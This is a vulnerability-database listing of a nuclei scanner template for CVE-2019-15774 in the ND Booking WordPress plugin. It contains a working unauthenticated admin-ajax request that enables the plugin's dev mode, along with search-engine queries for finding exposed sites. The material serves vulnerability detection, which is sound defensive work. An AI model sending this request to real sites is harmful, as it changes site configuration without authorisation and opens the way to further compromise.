ND Booking < 2.5 - Unauthenticated Options Change

03 Jul 2026 13:39:16 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

The ND Booking plugin below version 2.5 has an unauthenticated options change vulnerability (CVE-2019-15774).

Related

Reporter | Title | Published
Circl | CVE-2019-15774 | 18 Sep 2025 11:49
CNVD | WordPress nd-booking Plugin Unauthorized Operation Vulnerability | 2 Sep 2019 00:00
CVE | CVE-2019-15774 | 29 Aug 2019 11:42
Cvelist | CVE-2019-15774 | 29 Aug 2019 11:42
EUVD | EUVD-2019-6698 | 7 Oct 2025 00:30
NVD | CVE-2019-15774 | 29 Aug 2019 12:15
OSV | CVE-2019-15774 | 29 Aug 2019 12:15
Prion | Code injection | 29 Aug 2019 12:15
RedhatCVE | CVE-2019-15774 | 22 May 2025 07:37
VulnCheck KEV | VulnCheck KEV: CVE-2019-15774 | 5 Aug 2019 00:00

id: CVE-2019-15774

info:
  name: ND Booking < 2.5 - Unauthenticated Options Change
  author: popcorn94
  severity: medium
  description: |
    The Hotel Booking WordPress plugin ND Booking < 2.5 was affected by an Unauthenticated Options Change security vulnerability.
  impact: |
    Unauthenticated attackers can modify WordPress plugin options, potentially enabling development mode or altering plugin configuration to facilitate further attacks or compromise site functionality.
  remediation: |
    Update the ND Booking plugin to version 2.5 or later.
  reference:
    - https://wpscan.com/vulnerability/fb211b8b-5c32-40df-b197-bb51fc672b4b/
    - https://blog.nintechnet.com/privilege-escalation-vulnerability-in-wordpress-nd-booking-plugin/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-15774
    cwe-id: CWE-601
    epss-score: 0.01731
    epss-percentile: 0.74831
    cpe: cpe:2.3:a:booking_project:booking:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    vendor: booking_project
    product: booking
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/nd-booking"
    fofa-query: body="/wp-content/plugins/nd-booking/"
    publicwww-query: "/wp-content/plugins/nd-booking/"
  tags: cve,cve2019,wordpress,wp-plugin,nd-booking,intrusive,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/nd-booking/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Booking WP plugin')"
          - compare_versions(version, '< 2.5')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=nd_booking_import_settings_php_function&nd_booking_value_import_settings=nd_booking_plugin_dev_mode%5Bnd_booking_option_value%5D1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Updated option \"nd_booking_plugin_dev_mode\" with the same value."
          - "Updated option \"nd_booking_plugin_dev_mode\" with 1."
        condition: or

      - type: status
        status:
          - 200
# digest: 490a0046304402206f2c240d8315c53ec62da161e492366f6cfe0b46f5ddbf539b94cff8f29e0ae302206368bd445fcba9b85adc45161d9ef9bb73e7cb54fc67e2d5cd6b46e5e39edf6f:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (Current)
Vulners AI Score: 6.4 (Medium risk)
CVSS 2: 5.8
CVSS 3: 6.1
EPSS: 0.01731